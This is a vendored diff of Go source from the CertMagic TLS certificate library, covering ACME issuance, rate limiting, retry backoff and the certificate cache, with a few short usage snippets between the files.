||||
|
||||
func (c *acmeClient) throttle(ctx context.Context, names []string) error {
|
||||
// throttling is scoped to CA + account email
|
||||
rateLimiterKey := c.acmeClient.Directory + "," + c.iss.Email
|
||||
rateLimitersMu.Lock()
|
||||
rl, ok := rateLimiters[rateLimiterKey]
|
||||
if !ok {
|
||||
rl = NewRateLimiter(RateLimitEvents, RateLimitEventsWindow)
|
||||
rateLimiters[rateLimiterKey] = rl
|
||||
// TODO: stop rate limiter when it is garbage-collected...
|
||||
}
|
||||
rateLimitersMu.Unlock()
|
||||
if c.iss.Logger != nil {
|
||||
c.iss.Logger.Info("waiting on internal rate limiter",
|
||||
zap.Strings("identifiers", names),
|
||||
zap.String("ca", c.acmeClient.Directory),
|
||||
zap.String("account", c.iss.Email),
|
||||
)
|
||||
}
|
||||
err := rl.Wait(ctx)
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
if c.iss.Logger != nil {
|
||||
c.iss.Logger.Info("done waiting on internal rate limiter",
|
||||
zap.Strings("identifiers", names),
|
||||
zap.String("ca", c.acmeClient.Directory),
|
||||
zap.String("account", c.iss.Email),
|
||||
)
|
||||
}
|
||||
return nil
|
||||
}
|
||||
|
||||
func (c *acmeClient) usingTestCA() bool {
|
||||
return c.iss.TestCA != "" && c.acmeClient.Directory == c.iss.TestCA
|
||||
}
|
||||
|
||||
func (c *acmeClient) revoke(ctx context.Context, cert *x509.Certificate, reason int) error {
|
||||
return c.acmeClient.RevokeCertificate(ctx, c.account,
|
||||
cert, c.account.PrivateKey, reason)
|
||||
}
|
||||
|
||||
func buildUAString() string {
|
||||
ua := "CertMagic"
|
||||
if UserAgent != "" {
|
||||
ua = UserAgent + " " + ua
|
||||
}
|
||||
return ua
|
||||
}
|
||||
|
||||
// These internal rate limits are designed to prevent accidentally
|
||||
// firehosing a CA's ACME endpoints. They are not intended to
|
||||
// replace or replicate the CA's actual rate limits.
|
||||
//
|
||||
// Let's Encrypt's rate limits can be found here:
|
||||
// https://letsencrypt.org/docs/rate-limits/
|
||||
//
|
||||
// Currently (as of December 2019), Let's Encrypt's most relevant
|
||||
// rate limit for large deployments is 300 new orders per account
|
||||
// per 3 hours (on average, or best case, that's about 1 every 36
|
||||
// seconds, or 2 every 72 seconds, etc.); but it's not reasonable
|
||||
// to try to assume that our internal state is the same as the CA's
|
||||
// (due to process restarts, config changes, failed validations,
|
||||
// etc.) and ultimately, only the CA's actual rate limiter is the
|
||||
// authority. Thus, our own rate limiters do not attempt to enforce
|
||||
// external rate limits. Doing so causes problems when the domains
|
||||
// are not in our control (i.e. serving customer sites) and/or lots
|
||||
// of domains fail validation: they clog our internal rate limiter
|
||||
// and nearly starve out (or at least slow down) the other domains
|
||||
// that need certificates. Failed transactions are already retried
|
||||
// with exponential backoff, so adding in rate limiting can slow
|
||||
// things down even more.
|
||||
//
|
||||
// Instead, the point of our internal rate limiter is to avoid
|
||||
// hammering the CA's endpoint when there are thousands or even
|
||||
// millions of certificates under management. Our goal is to
|
||||
// allow small bursts in a relatively short timeframe so as to
|
||||
// not block any one domain for too long, without unleashing
|
||||
// thousands of requests to the CA at once.
|
||||
var (
|
||||
rateLimiters = make(map[string]*RingBufferRateLimiter)
|
||||
rateLimitersMu sync.RWMutex
|
||||
|
||||
// RateLimitEvents is how many new events can be allowed
|
||||
// in RateLimitEventsWindow.
|
||||
RateLimitEvents = 10
|
||||
|
||||
// RateLimitEventsWindow is the size of the sliding
|
||||
// window that throttles events.
|
||||
RateLimitEventsWindow = 10 * time.Second
|
||||
)
|
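Because RateLimitEvents and RateLimitEventsWindow are exported, the internal throttle can be tuned before certificate management starts; a small sketch with arbitrary example values:

package main

import (
	"time"

	"github.com/caddyserver/certmagic"
)

func init() {
	// Allow up to 20 new ACME transactions per minute per CA+account pair.
	// This changes only the client-side throttle, not the CA's own limits.
	certmagic.RateLimitEvents = 20
	certmagic.RateLimitEventsWindow = time.Minute
}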
||||
|
||||
// Some default values passed down to the underlying ACME client.
|
||||
var (
|
||||
UserAgent string
|
||||
HTTPTimeout = 30 * time.Second
|
||||
)
|
466
vendor/github.com/caddyserver/certmagic/acmeissuer.go
generated
vendored
Normal file
@ -0,0 +1,466 @@
|
||||
package certmagic
|
||||
|
||||
import (
|
||||
"context"
|
||||
"crypto/x509"
|
||||
"errors"
|
||||
"fmt"
|
||||
"net/http"
|
||||
"net/url"
|
||||
"sort"
|
||||
"strings"
|
||||
"time"
|
||||
|
||||
"github.com/mholt/acmez"
|
||||
"github.com/mholt/acmez/acme"
|
||||
"go.uber.org/zap"
|
||||
)
|
||||
|
||||
// ACMEIssuer gets certificates using ACME. It implements the PreChecker,
|
||||
// Issuer, and Revoker interfaces.
|
||||
//
|
||||
// It is NOT VALID to use an ACMEIssuer without calling NewACMEIssuer().
|
||||
// It fills in any default values from DefaultACME as well as setting up
|
||||
// internal state that is necessary for valid use. Always call
|
||||
// NewACMEIssuer() to get a valid ACMEIssuer value.
|
||||
type ACMEIssuer struct {
|
||||
// The endpoint of the directory for the ACME
|
||||
// CA we are to use
|
||||
CA string
|
||||
|
||||
// TestCA is the endpoint of the directory for
|
||||
// an ACME CA to use to test domain validation,
|
||||
// but any certs obtained from this CA are
|
||||
// discarded
|
||||
TestCA string
|
||||
|
||||
// The email address to use when creating or
|
||||
// selecting an existing ACME server account
|
||||
Email string
|
||||
|
||||
// The PEM-encoded private key of the ACME
|
||||
// account to use; only needed if the account
|
||||
// is already created on the server and
|
||||
// can be looked up with the ACME protocol
|
||||
AccountKeyPEM string
|
||||
|
||||
// Set to true if agreed to the CA's
|
||||
// subscriber agreement
|
||||
Agreed bool
|
||||
|
||||
// An optional external account to associate
|
||||
// with this ACME account
|
||||
ExternalAccount *acme.EAB
|
||||
|
||||
// Disable all HTTP challenges
|
||||
DisableHTTPChallenge bool
|
||||
|
||||
// Disable all TLS-ALPN challenges
|
||||
DisableTLSALPNChallenge bool
|
||||
|
||||
// The host (ONLY the host, not port) to listen
|
||||
// on if necessary to start a listener to solve
|
||||
// an ACME challenge
|
||||
ListenHost string
|
||||
|
||||
// The alternate port to use for the ACME HTTP
|
||||
// challenge; if non-empty, this port will be
|
||||
// used instead of HTTPChallengePort to spin up
|
||||
// a listener for the HTTP challenge
|
||||
AltHTTPPort int
|
||||
|
||||
// The alternate port to use for the ACME
|
||||
// TLS-ALPN challenge; the system must forward
|
||||
// TLSALPNChallengePort to this port for
|
||||
// challenge to succeed
|
||||
AltTLSALPNPort int
|
||||
|
||||
// The solver for the dns-01 challenge;
|
||||
// usually this is a DNS01Solver value
|
||||
// from this package
|
||||
DNS01Solver acmez.Solver
|
||||
|
||||
// TrustedRoots specifies a pool of root CA
|
||||
// certificates to trust when communicating
|
||||
// over a network to a peer.
|
||||
TrustedRoots *x509.CertPool
|
||||
|
||||
// The maximum amount of time to allow for
|
||||
// obtaining a certificate. If empty, the
|
||||
// default from the underlying ACME lib is
|
||||
// used. If set, it must not be too low so
|
||||
// as to cancel challenges too early.
|
||||
CertObtainTimeout time.Duration
|
||||
|
||||
// Address of custom DNS resolver to be used
|
||||
// when communicating with ACME server
|
||||
Resolver string
|
||||
|
||||
// Callback function that is called before a
|
||||
// new ACME account is registered with the CA;
|
||||
// it allows for last-second config changes
|
||||
// of the ACMEIssuer and the Account.
|
||||
// (TODO: this feature is still EXPERIMENTAL and subject to change)
|
||||
NewAccountFunc func(context.Context, *ACMEIssuer, acme.Account) (acme.Account, error)
|
||||
|
||||
// Preferences for selecting alternate
|
||||
// certificate chains
|
||||
PreferredChains ChainPreference
|
||||
|
||||
// Set a logger to enable logging
|
||||
Logger *zap.Logger
|
||||
|
||||
config *Config
|
||||
httpClient *http.Client
|
||||
}
|
||||
|
||||
// NewACMEIssuer constructs a valid ACMEIssuer based on a template
|
||||
// configuration; any empty values will be filled in by defaults in
|
||||
// DefaultACME, and if any required values are still empty, sensible
|
||||
// defaults will be used.
|
||||
//
|
||||
// Typically, you'll create the Config first with New() or NewDefault(),
|
||||
// then call NewACMEIssuer(), then assign the return value to the Issuers
|
||||
// field of the Config.
|
||||
func NewACMEIssuer(cfg *Config, template ACMEIssuer) *ACMEIssuer {
|
||||
if cfg == nil {
|
||||
panic("cannot make valid ACMEIssuer without an associated CertMagic config")
|
||||
}
|
||||
if template.CA == "" {
|
||||
template.CA = DefaultACME.CA
|
||||
}
|
||||
if template.TestCA == "" && template.CA == DefaultACME.CA {
|
||||
// only use the default test CA if the CA is also
|
||||
// the default CA; no point in testing against
|
||||
// Let's Encrypt's staging server if we are not
|
||||
// using their production server too
|
||||
template.TestCA = DefaultACME.TestCA
|
||||
}
|
||||
if template.Email == "" {
|
||||
template.Email = DefaultACME.Email
|
||||
}
|
||||
if template.AccountKeyPEM == "" {
|
||||
template.AccountKeyPEM = DefaultACME.AccountKeyPEM
|
||||
}
|
||||
if !template.Agreed {
|
||||
template.Agreed = DefaultACME.Agreed
|
||||
}
|
||||
if template.ExternalAccount == nil {
|
||||
template.ExternalAccount = DefaultACME.ExternalAccount
|
||||
}
|
||||
if !template.DisableHTTPChallenge {
|
||||
template.DisableHTTPChallenge = DefaultACME.DisableHTTPChallenge
|
||||
}
|
||||
if !template.DisableTLSALPNChallenge {
|
||||
template.DisableTLSALPNChallenge = DefaultACME.DisableTLSALPNChallenge
|
||||
}
|
||||
if template.ListenHost == "" {
|
||||
template.ListenHost = DefaultACME.ListenHost
|
||||
}
|
||||
if template.AltHTTPPort == 0 {
|
||||
template.AltHTTPPort = DefaultACME.AltHTTPPort
|
||||
}
|
||||
if template.AltTLSALPNPort == 0 {
|
||||
template.AltTLSALPNPort = DefaultACME.AltTLSALPNPort
|
||||
}
|
||||
if template.DNS01Solver == nil {
|
||||
template.DNS01Solver = DefaultACME.DNS01Solver
|
||||
}
|
||||
if template.TrustedRoots == nil {
|
||||
template.TrustedRoots = DefaultACME.TrustedRoots
|
||||
}
|
||||
if template.CertObtainTimeout == 0 {
|
||||
template.CertObtainTimeout = DefaultACME.CertObtainTimeout
|
||||
}
|
||||
if template.Resolver == "" {
|
||||
template.Resolver = DefaultACME.Resolver
|
||||
}
|
||||
if template.NewAccountFunc == nil {
|
||||
template.NewAccountFunc = DefaultACME.NewAccountFunc
|
||||
}
|
||||
if template.Logger == nil {
|
||||
template.Logger = DefaultACME.Logger
|
||||
}
|
||||
template.config = cfg
|
||||
return &template
|
||||
}
|
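The doc comment above describes the intended order: build the Config, construct the issuer from a template, then assign it to the Config's Issuers field. A minimal sketch of that wiring, assuming the default cache and hypothetical values:

cfg := certmagic.NewDefault()
issuer := certmagic.NewACMEIssuer(cfg, certmagic.ACMEIssuer{
	CA:     certmagic.LetsEncryptStagingCA, // staging endpoint while testing
	Email:  "admin@example.com",            // hypothetical address
	Agreed: true,
})
cfg.Issuers = []certmagic.Issuer{issuer}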
||||
|
||||
// IssuerKey returns the unique issuer key for the
|
||||
// configured CA endpoint.
|
||||
func (am *ACMEIssuer) IssuerKey() string {
|
||||
return am.issuerKey(am.CA)
|
||||
}
|
||||
|
||||
func (*ACMEIssuer) issuerKey(ca string) string {
|
||||
key := ca
|
||||
if caURL, err := url.Parse(key); err == nil {
|
||||
key = caURL.Host
|
||||
if caURL.Path != "" {
|
||||
// keep the path, but make sure it's a single
|
||||
// component (i.e. no forward slashes, and for
|
||||
// good measure, no backward slashes either)
|
||||
const hyphen = "-"
|
||||
repl := strings.NewReplacer(
|
||||
"/", hyphen,
|
||||
"\\", hyphen,
|
||||
)
|
||||
path := strings.Trim(repl.Replace(caURL.Path), hyphen)
|
||||
if path != "" {
|
||||
key += hyphen + path
|
||||
}
|
||||
}
|
||||
}
|
||||
return key
|
||||
}
|
||||
|
||||
// PreCheck performs a few simple checks before obtaining or
|
||||
// renewing a certificate with ACME, and returns whether this
|
||||
// batch is eligible for certificates if using Let's Encrypt.
|
||||
// It also ensures that an email address is available.
|
||||
func (am *ACMEIssuer) PreCheck(ctx context.Context, names []string, interactive bool) error {
|
||||
publicCA := strings.Contains(am.CA, "api.letsencrypt.org") || strings.Contains(am.CA, "acme.zerossl.com")
|
||||
if publicCA {
|
||||
for _, name := range names {
|
||||
if !SubjectQualifiesForPublicCert(name) {
|
||||
return fmt.Errorf("subject does not qualify for a public certificate: %s", name)
|
||||
}
|
||||
}
|
||||
}
|
||||
return am.getEmail(ctx, interactive)
|
||||
}
|
||||
|
||||
// Issue implements the Issuer interface. It obtains a certificate for the given csr using
|
||||
// the ACME configuration am.
|
||||
func (am *ACMEIssuer) Issue(ctx context.Context, csr *x509.CertificateRequest) (*IssuedCertificate, error) {
|
||||
if am.config == nil {
|
||||
panic("missing config pointer (must use NewACMEIssuer)")
|
||||
}
|
||||
|
||||
var isRetry bool
|
||||
if attempts, ok := ctx.Value(AttemptsCtxKey).(*int); ok {
|
||||
isRetry = *attempts > 0
|
||||
}
|
||||
|
||||
cert, usedTestCA, err := am.doIssue(ctx, csr, isRetry)
|
||||
if err != nil {
|
||||
return nil, err
|
||||
}
|
||||
|
||||
// important to note that usedTestCA is not necessarily the same as isRetry
|
||||
// (usedTestCA can be true if the main CA and the test CA happen to be the same)
|
||||
if isRetry && usedTestCA && am.CA != am.TestCA {
|
||||
// succeeded with testing endpoint, so try again with production endpoint
|
||||
// (only if the production endpoint is different from the testing endpoint)
|
||||
// TODO: This logic is imperfect and could benefit from some refinement.
|
||||
// The two CA endpoints likely have different states, which could cause one
|
||||
// to succeed and the other to fail, even if it's not a validation error.
|
||||
// Two common cases would be:
|
||||
// 1) Rate limiter state. This is more likely to cause prod to fail while
|
||||
// staging succeeds, since prod usually has tighter rate limits. Thus, if
|
||||
// initial attempt failed in prod due to rate limit, first retry (on staging)
|
||||
// might succeed, and then trying prod again right way would probably still
|
||||
// fail; normally this would terminate retries but the right thing to do in
|
||||
// this case is to back off and retry again later. We could refine this logic
|
||||
// to stick with the production endpoint on retries unless the error changes.
|
||||
// 2) Cached authorizations state. If a domain validates successfully with
|
||||
// one endpoint, but then the other endpoint is used, it might fail, e.g. if
|
||||
// DNS was just changed or is still propagating. In this case, the second CA
|
||||
// should continue to be retried with backoff, without switching back to the
|
||||
// other endpoint. This is more likely to happen if a user is testing with
|
||||
// the staging CA as the main CA, then changes their configuration once they
|
||||
// think they are ready for the production endpoint.
|
||||
cert, _, err = am.doIssue(ctx, csr, false)
|
||||
if err != nil {
|
||||
// succeeded with test CA but failed just now with the production CA;
|
||||
// either we are observing differing internal states of each CA that will
|
||||
// work out with time, or there is a bug/misconfiguration somewhere
|
||||
// externally; it is hard to tell which! one easy cue is whether the
|
||||
// error is specifically a 429 (Too Many Requests); if so, we should
|
||||
// probably keep retrying
|
||||
var problem acme.Problem
|
||||
if errors.As(err, &problem) {
|
||||
if problem.Status == http.StatusTooManyRequests {
|
||||
// DON'T abort retries; the test CA succeeded (even
|
||||
// if it's cached, it recently succeeded!) so we just
|
||||
// need to keep trying (with backoff) until this CA's
|
||||
// rate limits expire...
|
||||
// TODO: as mentioned in comment above, we would benefit
|
||||
// by pinning the main CA at this point instead of
|
||||
// needlessly retrying with the test CA first each time
|
||||
return nil, err
|
||||
}
|
||||
}
|
||||
return nil, ErrNoRetry{err}
|
||||
}
|
||||
}
|
||||
|
||||
return cert, err
|
||||
}
|
||||
|
||||
func (am *ACMEIssuer) doIssue(ctx context.Context, csr *x509.CertificateRequest, useTestCA bool) (*IssuedCertificate, bool, error) {
|
||||
client, err := am.newACMEClientWithAccount(ctx, useTestCA, false)
|
||||
if err != nil {
|
||||
return nil, false, err
|
||||
}
|
||||
usingTestCA := client.usingTestCA()
|
||||
|
||||
nameSet := namesFromCSR(csr)
|
||||
|
||||
if !useTestCA {
|
||||
if err := client.throttle(ctx, nameSet); err != nil {
|
||||
return nil, usingTestCA, err
|
||||
}
|
||||
}
|
||||
|
||||
certChains, err := client.acmeClient.ObtainCertificateUsingCSR(ctx, client.account, csr)
|
||||
if err != nil {
|
||||
return nil, usingTestCA, fmt.Errorf("%v %w (ca=%s)", nameSet, err, client.acmeClient.Directory)
|
||||
}
|
||||
if len(certChains) == 0 {
|
||||
return nil, usingTestCA, fmt.Errorf("no certificate chains")
|
||||
}
|
||||
|
||||
preferredChain := am.selectPreferredChain(certChains)
|
||||
|
||||
ic := &IssuedCertificate{
|
||||
Certificate: preferredChain.ChainPEM,
|
||||
Metadata: preferredChain,
|
||||
}
|
||||
|
||||
return ic, usingTestCA, nil
|
||||
}
|
||||
|
||||
// selectPreferredChain sorts and then filters the certificate chains to find the optimal
|
||||
// chain preferred by the client. If there's only one chain, that is returned without any
|
||||
// processing. If there are no matches, the first chain is returned.
|
||||
func (am *ACMEIssuer) selectPreferredChain(certChains []acme.Certificate) acme.Certificate {
|
||||
if len(certChains) == 1 {
|
||||
if am.Logger != nil && (len(am.PreferredChains.AnyCommonName) > 0 || len(am.PreferredChains.RootCommonName) > 0) {
|
||||
am.Logger.Debug("there is only one chain offered; selecting it regardless of preferences",
|
||||
zap.String("chain_url", certChains[0].URL))
|
||||
}
|
||||
return certChains[0]
|
||||
}
|
||||
|
||||
if am.PreferredChains.Smallest != nil {
|
||||
if *am.PreferredChains.Smallest {
|
||||
sort.Slice(certChains, func(i, j int) bool {
|
||||
return len(certChains[i].ChainPEM) < len(certChains[j].ChainPEM)
|
||||
})
|
||||
} else {
|
||||
sort.Slice(certChains, func(i, j int) bool {
|
||||
return len(certChains[i].ChainPEM) > len(certChains[j].ChainPEM)
|
||||
})
|
||||
}
|
||||
}
|
||||
|
||||
if len(am.PreferredChains.AnyCommonName) > 0 || len(am.PreferredChains.RootCommonName) > 0 {
|
||||
// in order to inspect, we need to decode their PEM contents
|
||||
decodedChains := make([][]*x509.Certificate, len(certChains))
|
||||
for i, chain := range certChains {
|
||||
certs, err := parseCertsFromPEMBundle(chain.ChainPEM)
|
||||
if err != nil {
|
||||
if am.Logger != nil {
|
||||
am.Logger.Error("unable to parse PEM certificate chain",
|
||||
zap.Int("chain", i),
|
||||
zap.Error(err))
|
||||
}
|
||||
continue
|
||||
}
|
||||
decodedChains[i] = certs
|
||||
}
|
||||
|
||||
if len(am.PreferredChains.AnyCommonName) > 0 {
|
||||
for _, prefAnyCN := range am.PreferredChains.AnyCommonName {
|
||||
for i, chain := range decodedChains {
|
||||
for _, cert := range chain {
|
||||
if cert.Issuer.CommonName == prefAnyCN {
|
||||
if am.Logger != nil {
|
||||
am.Logger.Debug("found preferred certificate chain by issuer common name",
|
||||
zap.String("preference", prefAnyCN),
|
||||
zap.Int("chain", i))
|
||||
}
|
||||
return certChains[i]
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
if len(am.PreferredChains.RootCommonName) > 0 {
|
||||
for _, prefRootCN := range am.PreferredChains.RootCommonName {
|
||||
for i, chain := range decodedChains {
|
||||
if chain[len(chain)-1].Issuer.CommonName == prefRootCN {
|
||||
if am.Logger != nil {
|
||||
am.Logger.Debug("found preferred certificate chain by root common name",
|
||||
zap.String("preference", prefRootCN),
|
||||
zap.Int("chain", i))
|
||||
}
|
||||
return certChains[i]
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
if am.Logger != nil {
|
||||
am.Logger.Warn("did not find chain matching preferences; using first")
|
||||
}
|
||||
}
|
||||
|
||||
return certChains[0]
|
||||
}
|
||||
|
||||
// Revoke implements the Revoker interface. It revokes the given certificate.
|
||||
func (am *ACMEIssuer) Revoke(ctx context.Context, cert CertificateResource, reason int) error {
|
||||
client, err := am.newACMEClientWithAccount(ctx, false, false)
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
|
||||
certs, err := parseCertsFromPEMBundle(cert.CertificatePEM)
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
|
||||
return client.revoke(ctx, certs[0], reason)
|
||||
}
|
||||
|
||||
// ChainPreference describes the client's preferred certificate chain,
|
||||
// useful if the CA offers alternate chains. The first matching chain
|
||||
// will be selected.
|
||||
type ChainPreference struct {
|
||||
// Prefer chains with the fewest number of bytes.
|
||||
Smallest *bool
|
||||
|
||||
// Select first chain having a root with one of
|
||||
// these common names.
|
||||
RootCommonName []string
|
||||
|
||||
// Select first chain that has any issuer with one
|
||||
// of these common names.
|
||||
AnyCommonName []string
|
||||
}
|
||||
|
||||
// DefaultACME specifies default settings to use for ACMEIssuers.
|
||||
// Using this value is optional but can be convenient.
|
||||
var DefaultACME = ACMEIssuer{
|
||||
CA: LetsEncryptProductionCA,
|
||||
TestCA: LetsEncryptStagingCA,
|
||||
}
|
||||
|
||||
// Some well-known CA endpoints available to use.
|
||||
const (
|
||||
LetsEncryptStagingCA = "https://acme-staging-v02.api.letsencrypt.org/directory"
|
||||
LetsEncryptProductionCA = "https://acme-v02.api.letsencrypt.org/directory"
|
||||
ZeroSSLProductionCA = "https://acme.zerossl.com/v2/DV90"
|
||||
)
|
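These package-level defaults can be adjusted before any certificates are managed; for example, pointing DefaultACME at the staging directory and preferring a chain rooted at a particular common name (the CN shown is only an example):

certmagic.DefaultACME.CA = certmagic.LetsEncryptStagingCA
certmagic.DefaultACME.PreferredChains = certmagic.ChainPreference{
	RootCommonName: []string{"ISRG Root X1"}, // example root CN
}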
||||
|
||||
// prefixACME is the storage key prefix used for ACME-specific assets.
|
||||
const prefixACME = "acme"
|
||||
|
||||
// Interface guards
|
||||
var (
|
||||
_ PreChecker = (*ACMEIssuer)(nil)
|
||||
_ Issuer = (*ACMEIssuer)(nil)
|
||||
_ Revoker = (*ACMEIssuer)(nil)
|
||||
)
|
187
vendor/github.com/caddyserver/certmagic/async.go
generated
vendored
Normal file
@ -0,0 +1,187 @@
|
||||
package certmagic
|
||||
|
||||
import (
|
||||
"context"
|
||||
"errors"
|
||||
"log"
|
||||
"runtime"
|
||||
"sync"
|
||||
"time"
|
||||
|
||||
"go.uber.org/zap"
|
||||
)
|
||||
|
||||
var jm = &jobManager{maxConcurrentJobs: 1000}
|
||||
|
||||
type jobManager struct {
|
||||
mu sync.Mutex
|
||||
maxConcurrentJobs int
|
||||
activeWorkers int
|
||||
queue []namedJob
|
||||
names map[string]struct{}
|
||||
}
|
||||
|
||||
type namedJob struct {
|
||||
name string
|
||||
job func() error
|
||||
logger *zap.Logger
|
||||
}
|
||||
|
||||
// Submit enqueues the given job with the given name. If name is non-empty
|
||||
// and a job with the same name is already enqueued or running, this is a
|
||||
// no-op. If name is empty, no duplicate prevention will occur. The job
|
||||
// manager will then run this job as soon as it is able.
|
||||
func (jm *jobManager) Submit(logger *zap.Logger, name string, job func() error) {
|
||||
jm.mu.Lock()
|
||||
defer jm.mu.Unlock()
|
||||
if jm.names == nil {
|
||||
jm.names = make(map[string]struct{})
|
||||
}
|
||||
if name != "" {
|
||||
// prevent duplicate jobs
|
||||
if _, ok := jm.names[name]; ok {
|
||||
return
|
||||
}
|
||||
jm.names[name] = struct{}{}
|
||||
}
|
||||
jm.queue = append(jm.queue, namedJob{name, job, logger})
|
||||
if jm.activeWorkers < jm.maxConcurrentJobs {
|
||||
jm.activeWorkers++
|
||||
go jm.worker()
|
||||
}
|
||||
}
|
||||
|
||||
func (jm *jobManager) worker() {
|
||||
defer func() {
|
||||
if err := recover(); err != nil {
|
||||
buf := make([]byte, stackTraceBufferSize)
|
||||
buf = buf[:runtime.Stack(buf, false)]
|
||||
log.Printf("panic: certificate worker: %v\n%s", err, buf)
|
||||
}
|
||||
}()
|
||||
|
||||
for {
|
||||
jm.mu.Lock()
|
||||
if len(jm.queue) == 0 {
|
||||
jm.activeWorkers--
|
||||
jm.mu.Unlock()
|
||||
return
|
||||
}
|
||||
next := jm.queue[0]
|
||||
jm.queue = jm.queue[1:]
|
||||
jm.mu.Unlock()
|
||||
if err := next.job(); err != nil {
|
||||
if next.logger != nil {
|
||||
next.logger.Error("job failed", zap.Error(err))
|
||||
}
|
||||
}
|
||||
if next.name != "" {
|
||||
jm.mu.Lock()
|
||||
delete(jm.names, next.name)
|
||||
jm.mu.Unlock()
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
func doWithRetry(ctx context.Context, log *zap.Logger, f func(context.Context) error) error {
|
||||
var attempts int
|
||||
ctx = context.WithValue(ctx, AttemptsCtxKey, &attempts)
|
||||
|
||||
// the initial intervalIndex is -1, signaling
|
||||
// that we should not wait for the first attempt
|
||||
start, intervalIndex := time.Now(), -1
|
||||
var err error
|
||||
|
||||
for time.Since(start) < maxRetryDuration {
|
||||
var wait time.Duration
|
||||
if intervalIndex >= 0 {
|
||||
wait = retryIntervals[intervalIndex]
|
||||
}
|
||||
timer := time.NewTimer(wait)
|
||||
select {
|
||||
case <-ctx.Done():
|
||||
timer.Stop()
|
||||
return context.Canceled
|
||||
case <-timer.C:
|
||||
err = f(ctx)
|
||||
attempts++
|
||||
if err == nil || errors.Is(err, context.Canceled) {
|
||||
return err
|
||||
}
|
||||
var errNoRetry ErrNoRetry
|
||||
if errors.As(err, &errNoRetry) {
|
||||
return err
|
||||
}
|
||||
if intervalIndex < len(retryIntervals)-1 {
|
||||
intervalIndex++
|
||||
}
|
||||
if time.Since(start) < maxRetryDuration {
|
||||
if log != nil {
|
||||
log.Error("will retry",
|
||||
zap.Error(err),
|
||||
zap.Int("attempt", attempts),
|
||||
zap.Duration("retrying_in", retryIntervals[intervalIndex]),
|
||||
zap.Duration("elapsed", time.Since(start)),
|
||||
zap.Duration("max_duration", maxRetryDuration))
|
||||
}
|
||||
} else {
|
||||
if log != nil {
|
||||
log.Error("final attempt; giving up",
|
||||
zap.Error(err),
|
||||
zap.Int("attempt", attempts),
|
||||
zap.Duration("elapsed", time.Since(start)),
|
||||
zap.Duration("max_duration", maxRetryDuration))
|
||||
}
|
||||
return nil
|
||||
}
|
||||
}
|
||||
}
|
||||
return err
|
||||
}
|
||||
|
||||
// ErrNoRetry is an error type which signals
|
||||
// to stop retries early.
|
||||
type ErrNoRetry struct{ Err error }
|
||||
|
||||
// Unwrap makes it so that e wraps e.Err.
|
||||
func (e ErrNoRetry) Unwrap() error { return e.Err }
|
||||
func (e ErrNoRetry) Error() string { return e.Err.Error() }
|
||||
|
||||
type retryStateCtxKey struct{}
|
||||
|
||||
// AttemptsCtxKey is the context key for the value
|
||||
// that holds the attempt counter. The value counts
|
||||
// how many times the operation has been attempted.
|
||||
// A value of 0 means first attempt.
|
||||
var AttemptsCtxKey retryStateCtxKey
|
||||
|
||||
// retryIntervals are based on the idea of exponential
|
||||
// backoff, but weighed a little more heavily to the
|
||||
// front. We figure that intermittent errors would be
|
||||
// resolved after the first retry, but any errors after
|
||||
// that would probably require at least a few minutes
|
||||
// to clear up: either for DNS to propagate, for the
|
||||
// administrator to fix their DNS or network properties,
|
||||
// or some other external factor needs to change. We
|
||||
// chose intervals that we think will be most useful
|
||||
// without introducing unnecessary delay. The last
|
||||
// interval in this list will be used until the time
|
||||
// of maxRetryDuration has elapsed.
|
||||
var retryIntervals = []time.Duration{
|
||||
1 * time.Minute,
|
||||
2 * time.Minute,
|
||||
2 * time.Minute,
|
||||
5 * time.Minute, // elapsed: 10 min
|
||||
10 * time.Minute,
|
||||
20 * time.Minute,
|
||||
20 * time.Minute, // elapsed: 1 hr
|
||||
30 * time.Minute,
|
||||
30 * time.Minute, // elapsed: 2 hr
|
||||
1 * time.Hour,
|
||||
3 * time.Hour, // elapsed: 6 hr
|
||||
6 * time.Hour, // for up to maxRetryDuration
|
||||
}
|
||||
|
||||
// maxRetryDuration is the maximum duration to try
|
||||
// doing retries using the above intervals.
|
||||
const maxRetryDuration = 24 * time.Hour * 30
|
364
vendor/github.com/caddyserver/certmagic/cache.go
generated
vendored
Normal file
@ -0,0 +1,364 @@
|
||||
// Copyright 2015 Matthew Holt
|
||||
//
|
||||
// Licensed under the Apache License, Version 2.0 (the "License");
|
||||
// you may not use this file except in compliance with the License.
|
||||
// You may obtain a copy of the License at
|
||||
//
|
||||
// http://www.apache.org/licenses/LICENSE-2.0
|
||||
//
|
||||
// Unless required by applicable law or agreed to in writing, software
|
||||
// distributed under the License is distributed on an "AS IS" BASIS,
|
||||
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
// See the License for the specific language governing permissions and
|
||||
// limitations under the License.
|
||||
|
||||
package certmagic
|
||||
|
||||
import (
|
||||
"fmt"
|
||||
weakrand "math/rand" // seeded elsewhere
|
||||
"strings"
|
||||
"sync"
|
||||
"time"
|
||||
|
||||
"go.uber.org/zap"
|
||||
)
|
||||
|
||||
// Cache is a structure that stores certificates in memory.
|
||||
// A Cache indexes certificates by name for quick access
|
||||
// during TLS handshakes, and avoids duplicating certificates
|
||||
// in memory. Generally, there should only be one per process.
|
||||
// However, that is not a strict requirement; but using more
|
||||
// than one is a code smell, and may indicate an
|
||||
// over-engineered design.
|
||||
//
|
||||
// An empty cache is INVALID and must not be used. Be sure
|
||||
// to call NewCache to get a valid value.
|
||||
//
|
||||
// These should be very long-lived values and must not be
|
||||
// copied. Before all references leave scope to be garbage
|
||||
// collected, ensure you call Stop() to stop maintenance on
|
||||
// the certificates stored in this cache and release locks.
|
||||
//
|
||||
// Caches are not usually manipulated directly; create a
|
||||
// Config value with a pointer to a Cache, and then use
|
||||
// the Config to interact with the cache. Caches are
|
||||
// agnostic of any particular storage or ACME config,
|
||||
// since each certificate may be managed and stored
|
||||
// differently.
|
||||
type Cache struct {
|
||||
// User configuration of the cache
|
||||
options CacheOptions
|
||||
|
||||
// The cache is keyed by certificate hash
|
||||
cache map[string]Certificate
|
||||
|
||||
// cacheIndex is a map of SAN to cache key (cert hash)
|
||||
cacheIndex map[string][]string
|
||||
|
||||
// Protects the cache and index maps
|
||||
mu sync.RWMutex
|
||||
|
||||
// Close this channel to cancel asset maintenance
|
||||
stopChan chan struct{}
|
||||
|
||||
